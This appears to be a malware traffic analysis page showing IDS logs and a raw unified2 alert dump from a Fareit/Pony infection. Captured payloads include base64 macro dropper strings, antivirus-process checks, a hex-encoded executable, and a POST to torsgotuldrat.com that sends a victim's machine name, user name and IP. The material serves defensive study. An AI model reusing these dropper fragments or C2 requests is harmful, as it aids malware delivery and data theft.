{"timestamp":"2018-12-20T15:25:55.155359+0000","flow_id":2023933352330472,"pcap_cnt":363,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":52595,"proto":"UDP","dns":{"type":"answer","id":26573,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns4.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:55.155359+0000","flow_id":2023933352330472,"pcap_cnt":363,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":52595,"proto":"UDP","dns":{"type":"answer","id":26573,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns3.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:55.561158+0000","flow_id":206462106427810,"pcap_cnt":369,"event_type":"alert","src_ip":"10.12.20.101","src_port":49175,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:56.114609+0000","flow_id":206462106427810,"pcap_cnt":373,"event_type":"fileinfo","src_ip":"10.12.20.101","src_port":49175,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","http":{"hostname":"torsgotuldrat.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":207,"tx_id":0}}
{"timestamp":"2018-12-20T15:25:56.116021+0000","flow_id":206462106427810,"pcap_cnt":375,"event_type":"http","src_ip":"10.12.20.101","src_port":49175,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"torsgotuldrat.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR

This file has been truncated. Go here to download in full.


unified2.alert.1553845446 - (28681 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
4\³ÎbFÑý/Zþ”
ePÀ¬\³Î\³ÎbFE‚i/Zþ”
ePÀPáɝêµ¾BÊqk¶S˜œ1é
Ôë†5å¯Cúk€²´:fU媤Òû’ßØ´—‰Ù­Ï²ª²»¿I.>¸à””– ìŽ“ø¼Ö&]Ä	裫€™
@3ÅfqŠEª±=ç¾ qÊ$šçvâFҘKX²)4—§s:V»	p¢®5º”m%¹;;ç'ÀÞN}QnÉΚø
‘ú\ÀŽf¥k3êã6C#AMuЕÖĜ?€Mb›ÛÁ76±gÓQ¯>Ó&/U{2þÍøMófl/%%å(OÔ¦2!§Ç
6À™Á]€â„ÛKdpTÎlóH¦@b³AìRþ]Ëk^Q°ÕCݬ;ú‹pl°	ڝ¦BÊq´7@_Úµ°»•¿‚n}ÊÝOódIŠ­ó’6@sel°\$A—Taµ«5Ð^–r½Ñ´×–Wâ\WWïW_4+FÕÄ^çpZÆ]àQÔŽ°·Ó¡.°3Ó×õøpØÎ\8‰»ÀE·ìKkb®ìtÇÓðÈmUzõ9²WýâßL€ú¢â(.),
@}Ì6f~¤±'Qñ¨®‘u0µÃ»Q¶Á~u_Ó¶lô ³	™0ëjìÎ}}:«¡±ÏbdC.P­.‡Ì HnA<‡š^övjÏ‚¤¾ª+D.6“«Ì1ƒ &µ|MuЕv¢ªBm@Ճޗiý¦eIªÙ8ú lUʦ_–÷÷'Pÿ—Ì´,ƒ’€ÀÒT“\ÚfjÓái0™šj¢&g ø&“ùTæä~çªg?
f¤Ä8ûikc9/¥Ñc·Sµf*72.‚Ìd‰Ê¢°Ó`
?
¦_$avwªÛ¤Á4˜VÂWˆZLOV‘LƒQmb†ÓRÂô¥ÈY—j‹ª£hŒûƤ¾¾Ñ¿
¢õaIDAT©OYÊZÎ7êNƒ±8“Ó:gö?9LƒÖí·e8YVM„ÎL„§X^eӁÔq'a ‰Ýå3¿ß¬±›S'­›“Ü	À`´XÍQÎf¦½Óê֙(jjæݨAY¢DŽ›$SY„ñ(˜,œÏ¢`w§~'7zš¢[_ÕX}5'B'¥Ù’N@719q¥äòèÕªµøGL„ößØì2@£ú¬åòr©ÎDh߶ËûµõF	@`—BºØBnš*“…wN6¼_À>sà €ƒë¥ïB €¶®Íwã’€°à!È˔ÁsS»&•|lç¤'£ÝÓÆO†€å¾Éï€IÕy»X+x\ªëJß±%Ÿ ºødûŒ–”ðs°ñ9tŸ
è{üSíՃXê©
R=˜¹êU"ë
y€¶€móË­ y€zàQ`i:WW‰ë'yôêû¯{ǎýHu_‹$w/P²Ï-­«L?L4Ó½[ugª¿{ؾÜ'@ýèùÎZõâ $\’°ýœè·ø$ÍÄàL=Š¤°¯ÞñqïØñu[€öixêæµ ¨6î^£ä^îÓiÊG5©‡B駱Œƒ%	@Ûï›ÇÅ™
@Ý
”O Õ¯Þ	ރdß±ã?ê Í)¹l'ÝýË}:Øæõ¸,ý*¢I^û%	@[ÀB?iE´mڗçØG$‡oÛ1Qå?Ú$Ýk”üË}tÚ×nÈ⨠ÓÏF®Çµ_’ð(ß8!_<æ0~óDð²	ûŽð£
ÐM±ñ/÷\³Î\³ÎbFêEÜh½/Zþ”
ePÀP!˜é´å\ùƒ{d©_’ð(_8¦_Q±2Í;v–à’k€.gQ˜…X«§0ûôK€"Ó¼–¡×é»ÌóoÛQä;+‚:ŽwGáË}º8nÔãŒý+à*ÀC hps€æn9¢ß-äÞ¶ãÞ±ã?²è_!<<°32@µ“™iå Ȝð8ϋ‘@5
F½kǼ~ÛÍyqïØéMƒ)ÝÛ#Ü	â¦Á˜×(eöE@aÖêe$rpXNƒQo rK€$unҟ­çHw&BO¢ô2mån©îî`g"´}>‚¿XO»™ig"´\’ز4ŸŒFE|RŽ×^¹ÍóZÿ«ÎóvegùÔþüs@žÝ÷xš•%	MòtÍ%³\ÿo™¤Xo[ë.àA$Ež«Ø[€InÌ·€í,y¸,›z“Å	@àðŒ+0Y15GÈ Ùf³²€C˜þÏ-$çxL‡h¢Óªá·2›mv	@ø·MMﳜ]`Ù؛Ö&“jÒ	«6¯æ¢ß<SaÐäy3W¡–¹lMš”ÛH¢æ£ú)©DÛvÙ œ©F۬Ć
£yRŠ]Èt@—ÉH5D͟"¾Ä_*©óùTôæ'Aƒu,–žå•H7ỶZ{–Ëb&êOóß¡©…T
Ž}á§ú¨«Äl¤
0%“_´ª¬ÓRÅ¿©­B…9y!3û®L6fÁrvk™þσܜÝ#€Qùr8!’6…ÀÌQ€*|×/žÈT2€ã<·¹4
~ÊÌbCh·i—±(?+«4À¨؈„hY¶¼˜É%ë°XÊÎýh.#f&;ïe5•Å™5µ({·EJÕò°G¥ˆÁ‰©Ý0œ‹?'º µÀ´*ÅÕL×b]ÉàšW®¶ä6frIUO[]Õâ_j~¹`k²àu5÷{ð ‚~¢
@Ý–' À‰»äg¯&2ìDb”¢Õ4*d²4âGûY¡p./Š?t¯ÒÿTȕ¦nD‡ªÀ`›¥ŠL×”Ê`ÀLí#•¡¡óÖEº	@µ¶úf&3½T˨Pifqf#ݘËÔ·™‰2Õ&—v|Hüip\ŒL6ÎıÌÙž™ŒKÌ6D¦©žÎlYÔBtk¸	—‹·¦vïöàg`¢Ïü¤Øúb€µŒ“6ÀjÕNUŽeˆ‰dÌLÐüÔªXk‡ÐlÓ-ӆ%œ5Ðôáå_zÉ2ÀñÈvQÕ_úÛR­4ž\;ћLMÔUº*±+Ù4u#þ’í¾ÙLW‘…×öj÷Ÿ¹‹î¬"Y~¿œßZ+«B$¦ß#€Ÿ€¥ýD^|.ãù.°êìɬg*m€ª|¢°qi©z©ö'µÎ’”ß»e¢”a1€MâgaÎs÷‰	@Eãr8ËÜvìmµÌEá&æÓÒ ½Ü'6V‹ÂVóI¥³Ë Êä1ýÿ 'jE°\°5ùK[ô{ð³®8NÃà@šhpà,
ÀÙn`÷9˙jÎݸo?Å*­(uÕ&¶Ž|&ê¿q°UcLÙ¢¿ùÝ<çÿŸÀƒ²£ÀÓY·¬Oƹ›3€êâ^`©ˆ-Ó»{º*¸<Ý2QÊdÑýÉá.ðx.pê»ÀKp÷9³J^µñhÿã¡Æ¦‰\™Mgqº®m€jÀ8@ß–[Kótš„{ð &6&A‘ͪtYŠoÛÆ
bLƒA9¿Úd‘ÿ©’±‚½Ë
‚ÌÌ E­fŠ\³Î\³ÎbFêEÜh½/Zþ”
ePÀP|øT:™Ô~dQªµÍ È`N£ÌªhF`]+¿‘ Ǎ>8™×U“ÉqÂ
éÁ
qPz¶M Þ.lM”Rýåöàa˜;AƝi0uYÔúŒm€öNVµš»"«uýô4˜i4•Åý”DÓ`ÔU®¤€ÉÀ4˜©Ì$9#1mԌ<õ¥þ3˜³0ƒi0C˜ˆc
pTʹwî[ۀÈLšÉÀ4™Úµ˨‚éh"l,ÿÑĘÉ#)‹"\.ÜZR•Ñ<{£‰Ði5^€jBï8í¸6o=×N„ÙXº»æÜOjrᆐøy€n›v²´
Àyi&1Ô橺¤¦úÞîO3za†¡°ßÖAªMNSßJž¸ÉÀDhשõçd*YÅÏä(v0"$‘C+~¹pkµ=²{p`]óµïL{p·«øimґžRýX”\Šð“¤ö¦ºÇÒ|<mQ{€3yÁð±ä_ûˆ¢ì´¤ØÊf&yjþ•æ“Þ·E2¸’\Ô/>´âház÷!‹eƒƒoó¼6ÿlòäÑþ€C­<¯’GuâíAŠˆÓfÛÀd–®ü†Ö3-²Ñ(+ʽ@e<Þhg?€‹þá°Êç+¿ü=È_´ý€”U*kêí´	Àˆ#Çª™ùS¦LÑdQçcÛä¹>UÆö#ÑXlôy&~œˆï¥ú.)íV&¢C=UÉZè-ŒýJI%¾s±`7œÏ§bI¹­ZüC-0ÉçbûemÓɕa&zë™Kž´4…¬Å?š¹îOd³«Ô+úM¹æØgͤšD»pe“Uд#}ˆº
¢r«B&aX©\C¥ÎÄTVq"—J½«Q&«m®¾kU™@¹
_5òªD)ÿNÍå‰$Ÿª#ÍU³²ökLódªöï¾QÈ*ÝøÔ¿™I®Ž+OôŸºêô†ËÌþƀÃc
qꔅ8K™i5•'8AË&a‘
³¹øs.O®™\·€•8ÛJ4Á2yšÉmµj%¹ù¤	Õؾ¶Ûp^ˆm••8sñ‘Z`’«E“NnQ½›Ç©ì·'nÂ^T-@€nÓzÍ ™;‘ù­v¦–te˼”«¤ùXn}>ꔻQûûœËòLÅQÊlí.¢¬dìLu¸
×AÎLfê§Æ¬0S?‰¦y]änMµ¼µ1ç֘êoŠ8sUe³ £`Z‰ßt¦¾/ÄolR%œ	8̜؎`*PµóÄù6V§M҈“D5\ª ×'¿+T/sVôP¥]"ÏÔÙ6§X£Všš–Vš·¦ëm7œM±×*9jq¾NF~TÃ-Z«&“ë­ëBŠ-OLÆöÐm:^Ó,íwá˖¨âUsÑÂR0,·Ìs€ºAZÎd¦Å¬s
p*P¤Í,‡ZÈÿn4¢Tâ[Q´RĖ
Àº_¤EžÙUÅGøh–©Œº¹ŒÎL.‘˜Ž®_cšªõ7‰ºÀ¦Êê8V'ÿSæcÀ¡à؆™NŠ6QièÏ~ÕÉßµúgùW·ìN7w9.it¢˜“Ìt`ý†õi_º~­(ˆ¹(ºç2}Ü¢sݾ±]`]HŒ³f„Y€vÓfÍ2é^f4»ˆË¦Rbbkf¨Ü2«Mø™ºŸu3
à\–ÇÔ¡Hµ©iŠ?S€™LGñÅØüWDÖb;ËĚòJñy¢š‡c·9¿ÆTõt}4¿‡Z&ç`šÿˆ¿º¿1€tŸŠ“ÏöÚlÆÈ,™›óEœŸ0iäzcróÊõÿLÖoØ`:V¹ëæ—[4‹cʎ³ÊFàŠ4köÐì"(Û¬2}SÑø\³Î\³ÎbFÜEÎiË/Zþ”
ePÀP‹Ïëg£^¹Ý&LúìHò`à#¾(ÃHTC=3¡h¾­Ä®eÎÌ.J—úr£ÍD|®pæЯ¡°
@vƒX›ß§ø…€à ½ØÀ&¾8$:z²	´F&*0T‰Eäß³h¦ß°K©Z^Ž
[€&Ü¢Y`í
©‡}—`±<}ÙÔ¬ ““±¼*—{Y£¨ØÀ&ïà<
Àfãl@àD£À.°ëñ9YUWó‘íöɶ]9@½•E"}ªI÷:“ß°K)}á*À2ì«kV]`™÷ï—QXÙÄõUõŒ–;îëƒO]™†pžë처êP”]àpÚJ·<u]àYжk,@Ùn–tºÀ8pá<@€Á HtÛA]UèkýrD‡OÙ@}¶õ¶Ióþ~£T+g*'f=’ÚQ<Ò¸`ŒA¦½Ôk†S÷&*·ì.\Ùô˜u*×ýêYÙ+·©‰A¦jDe¾,ő´À±Ì.?"~lÇnÕDÎìÆÁ H€É(X#
@{|fD]­Ðs{ÜÑ끬ÆÖˆÃÜ	âPMƒÉT(ÊnéØõÇúB½ŸÓªI U/ÇrF£G‹§:²ŠIarÁmØ¥T*75.Tñ4³è¬èLƒ©G©lÕ5Ñ4µ‹8G37Æôþ:»peSSk
5á.1U—[]ÝhÌL ˃Ÿ™´îqX«Ë‹•èѶþºb£ç—‡§Á¸”3ø‚5‚ÔßèF¤ªñM­¨’WªHW†Ó`@4/°ÀÎDèiêN&?ìD葚qÛ﫹ÉÙÌ´4Ì reW
7ìSJnj,\f–rN„Ve¡“2œ­Nµ3׬źu'ݚµ)Ë$Ï¢]زÉ/[ya@~o“;(÷Š‰Ð" ëE¨6>–½×6o³u3ZÖgþJ¦‰Ð.EŽËµkh¾‘‹Oe™Õ¯S
¸¶’Ñú‰Ð °~y§ï²y5/¢k€°¶r¶Ã…Wã½	à~
À]t6ÒWü|_ž°6ÏwõQ"m™‡O p@ÒÆ=§dë?óYÎ\Îòílw\xeSo²8`¬?°«2@ 	@;.ÑO--õÈöàUGêõCúUBzIó²¡àµGޗd_!äÐÞwª5•·
ÛÒù—÷¸—(Ù²Hò>Ö<‰—³[ËôÓVäæT±[~™îÕ,iÁ«ŽäÓ`Æù¬‘/Ij£ {íт÷%ù×™ôO©ôsœDpÍ£§–ÈïÜK”LYTÖÉ ÕoCrË[ÓÏƚ뱩WÀ}Pþ3xՑzºK¥BÅ>2Õ íÑàû’ü+„lúðÌääùZșÉ8ÿòÿ¥Òuw[ý,–&\.ޚÚ}ðœ;Ø<e¶õ^u¤ 7žFèŸ4ü¾$ÿ
!€þ<²Ý7›Éà²O\ö/ïñ»(;ï5— ñËù­É‡’ÊÄ4Åón[4\³Ïó *â3/Zþ”
ePÀ¬\³Ï\³Ïó E‚i/Zþ”
ePÀP?]ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(S<ÿÿÿÿS<ÿÿÿÿS<ÿÿÿÿS<ÿÿÿÿÿÿš0{6AE74A1C-FDFC-4255-9938-7D4012F4D215}{50C1ACA3-D7AE-4936-81E9-00B75EE37EE3}ÿÿÿÿx€þÿ8 ÿÿÿÿ0ÿÿÿÿÿÿÿÿÿÿ%þÿÿÿÿÿÿÿÿÿÿÿÿÿhÿÿ8ÿÿÿÿÿÿÿÿ%ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ8ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿßþÊÿÿÿÿÿÿÿÿxÿÿÿÿâ°Attribute VB_Name = "UserForm6"
"

€Bas€0{6AE74A1C-FDFC-4255-9938-7D4012F4D215}{50C1ACA3-D7AE-4936-81E9-00€B75EE37}
dGlobal!‹SpacoFalseŠCreatablPre declaIdÔTru
BExpose0TemplateDeriv–Customiz‹DrUÀ@@@~xÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿaSÑSSñ Z"a	Zÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(¹. tȹ4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA==$z |$x¹VGVtcA==$¬\³Ï\³Ïó E‚i/Zþ”
ePÀPó£z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿ˜kÿÿº¹n360 †$œ¹4CB52522 n r¹. tȹVGVtcA==$z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿðkÿÿ躹PccNT †$œ¹4CB52522 n r¹. tȹVGVtcA==$z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿHkÿÿ@º¹uiSeAgnt †$œ¹4CB52522 n r¹. tȹVGVtcA==$z |$x$D¹XDYuZXhl$z |$x –A@”|ÿÿ kÿÿ˜º¹mbam †$œ¹T¹e¹m¹p$D¹\1s.bat¬«Ï¬Õ¹cGluZyBsb2NhbGhvc3QgLW4gNjA=$z |$xØ –Ù¬Õ¹c3RhcnQgJXRlbXAlXDYucGlm$z |$xØ –ÙWÿÿà¹4CB52522 l¹6¹.pifȹT¹e¹m¹p$D¹\1s.bat –A@”|ÿÿpkÿÿhº¹mbamtray †$œ¹T¹e¹m¹p$D¹\1s.bat¬«Ï¬Õ¹cGluZyBsb2NhbGhvc3QgLW4gNjA=$z |$xØ –Ù¬Õ¹c3RhcnQgJXRlbXAlXDYucGlm$z |$xØ –ÙWÿÿ€¹4CB52522 l¹6¹.pifȹT¹e¹m¹p$D¹\1s.bat –A@”|ÿÿkÿÿ¹4CB52522 l¹6¹.pifȹ4Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3Q¬\³Ï\³Ïó E‚i/Zþ”
ePÀP¶{gLW4gMTAwICYmIA==$z |$x¹VGVtcA==$z |$x$D¹X¹DYuc¹Glm$z |$x –A@”oÿÿ0–oÿÿ –èoÿÿ–@]õà]õðÉ.žð¹b64 ž%¦.¢¹
bin.base64 ¢(¨ œ ¢(d ¢!ª'zð².¢ð².žiÿÿ€ú¹.– ]õDÀð¹*SELECT * FROM Win32_Process WHERE Name = ' ¬¹'¹w¹in¹mg¹mts¹$:{impersonationLevel=impersonate}!\\ ®¹\root\cimv2$²%´.° °!¶¬›Gº'jiÿÿˆÿÿÿÿ€ÿÿÿÿþÿÿÿ	

 !"#$%&'()*+,-./0123þÿÿÿ56789þÿÿÿ;þÿÿÿþÿÿÿ>þÿÿÿ@ABCþÿÿÿEþÿÿÿþÿÿÿHþÿÿÿJKLMþÿÿÿOþÿÿÿQRSTUVWþÿÿÿYþÿÿÿ[\]^þÿÿÿ`þÿÿÿþÿÿÿcþÿÿÿefghþÿÿÿjþÿÿÿlþÿÿÿnþÿÿÿpqrsþÿÿÿuþÿÿÿþÿÿÿxþÿÿÿz{|}þÿÿÿ€׶Attribute VB_Nam€e = "bc"
Sub closee()

Dim pl, kk, gdfsfsa
kk!d.com^

pl kk ChDir Environ("€T" & "e
’m
p"WllXjgf, tyr8etw>JStrConv(DecodeBase64("ZXhl"), vbUnfiG
E1"6Š®jddsd€fda As HHingX
= UserForm5.TextBox1wyrt fdsad4cx@vxc4\³Ï‚D۟/Zþ”
ePÀ\³Ï\³Ï‚DêEÜh½/Zþ”
ePÀP£–2A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm7 
   Caption         =   "UserForm7"
   ClientHeight    =   3165
   ClientLeft      =   45
   ClientTop       =   390
   ClientWidth     =   4710
   StartUpPosition =   1  'CenterOwner
   TypeInfoVer     =   1
End
	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïþÿÿÿôòóõþÿÿÿþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ@€H€,€€uã4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000\³Ï\³Ï‚DêEÜh½/Zþ”
ePÀPÏ"000000000380100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fa4affa5be2b91f6be2b91f6be2b91f65d0d8cf6bb2b91f6440888f6bc2b91f629efeff6bc2b91f699edecf6b22b91f699edfcf6a82b91f699edeaf6b82b91f6440fa8f6922b91f6bb27cef6bf2b91f6bb27ccf6bc2b91f67d24cef6bc2b91f6ad23cef6b22b91f6420b83f6b82b91f67d24f1f6c52b91f67d24ccf6ad2b91f6be2b90f6ec2a91f699edfff6a02b91f699ededf6bf2b91f6be2b91f6bf2b91f699ede9f6bf2b91f652696368be2b91f60000000000000000504500004c0104009fb2c15b0000000000000000e00002010b01080000f00000004000000000000051a400000010000000000100000040000010000000100000040000000000000004000000000000000050010000100000f4b70100020000000000100000100000000010000010000000000000100000000000000000000000100301007800000000300100b41e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100880100000000000000000000000000000000000000000000000000002e746578740000000ce700000010000000f0000000100000000000000000000000000000200000602e72646174610000900b0000000001000010000000000100000000000000000000000000400000402e6461746100000010150000001001000010000000100100000000000000000000000000400000c02e72737263000000002000000030010000200000002001000000000000000000000000004000004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ø\³Ï\³Ï‚DÜEÎiË/Zþ”
ePÀPž}000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004\´{ÁÚm!
e6ó{'ÀPö\´{\´{ÁÚEÌé¡
e6ó{'ÀPPɉGET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

4\´|	#+Š
eÙ‹ËÀPÍ\´|\´|	#±E£6
eÙ‹ËÀPPµÎPOST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: torsgotuldrat.com
Content-Length: 129
Cache-Control: no-cache

GUID=5630222068961844480&BUILD=20wvy12&INFO=PSIMON-SUCKZ-PC @ PSimon-Suckz-PC\art.garfunkle&IP=173.66.146.112&TYPE=1&WIN=6.1(x64)4\´};m+e-(•"
ePÀ¬\´}\´};mE‚Ô»-(•"
ePÀP×jM›¶.Î=òUP‚óÂ=ÍÔÛÕx^è/MopJn9]Á0à™Õ/ÉØNȘàoMÛ¾æƒÜYZö¨ÛŽ›ê¿ø°C‡¨‘T}¬:ÎÒXõøEUÈ­Uτë]µxC*Åã ¼šÁ4•j8AAèYpȺÈXȃÒ˜•«´Á€AÐüÕU@ýUšÅäÅõ=pÅ[Ù¨áÖuÆÛ÷–œØD×LØzB°‚²Ô}Ç+jp!·ßìcç¤ü¨_ÖãDó‰˜ÏXùC“º¸ð¹' كu.TŸ¦KWÊÚñCÍ
ã!ÁfèÝ^õã›ÀüœÚ9ïÊق#WVRmS™RV×ÜÈÎE<_­ÊQq擻C§ÓTêþ”¦ú¹ÿhVRª5´ð±Æ[ô™žt”É#
üèC´éI”ÉɀùB«n‡‹¨Õ!Ô°ÈXÛ÷Ö1ÿ[°ÄŒEò‰AÛ8¨^Ø.‘„¨žœ@Ä ×yìOl„•KøåKœl4UfÏ¿Âì5VSygÛ@¨D좛ÒHh9ì
,WŠŒƒhø•	ÝéDWˆ¨@Ý=l¯™pÈ$ŽºÈވ¨$†×[ɏ–©DQ&‚`ƒ§£TÄîÊUN[ØZ÷­$½Dùí°”{Í%CÙR-(܃›æ+hX٘I€kâU™X…k¨ÙìíÎå+ðeý£è€+±áËCZŠ0Y”Ò`Oˆ€+ìH¥çÉǍ
Ý´Ð}¨“ ©¹uÙ¬c‘œÔÌîÄ­R”ŠrQà‡F׍ü”ø

This file has been truncated. Go here to download in full.


keyword_perf.log - (13990 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 3/29/2019 -- 07:44:08
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             6866320         2311            2311            28323           2971.00         2971.00         0.00           
  content          39436530        2436            1187            504532          16189.00        16372.00        16015.00       
  pcre             3977995         1011            80              61491           3934.00         6366.00         3725.00        
  byte_test        767375          224             80              33522           3425.00         3696.00         3275.00        
  isdataat         16874           6               0               2866            2812.00         0.00            2812.00        
  flowbits         1771091         608             35              27031           2912.00         3421.00         2881.00        
  urilen           644388          195             67              39492           3304.00         3746.00         3073.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             6866320         2311            2311            28323           2971.00         2971.00         0.00           
  flowbits         1717472         595             22              27031           2886.00         3005.00         2881.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4566596         450             209             79586           10147.00        14094.00        6725.00        
  pcre             137504          7               1               45397           19643.00        11698.00        20967.00       
  byte_test        767375          224             80              33522           3425.00         3696.00         3275.00        
  isdataat         14272           5               0               2866            2854.00         0.00            2854.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         53619           13              13              8122            4124.00         4124.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          858930          210             125             54613           4090.00         3960.00         4280.00        
  pcre             797217          106             21              25989           7520.00         7574.00         7507.00        
  isdataat         2602            1               0               2602            2602.00         0.00            2602.00        
  urilen           644388          195             67              39492           3304.00         3746.00         3073.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
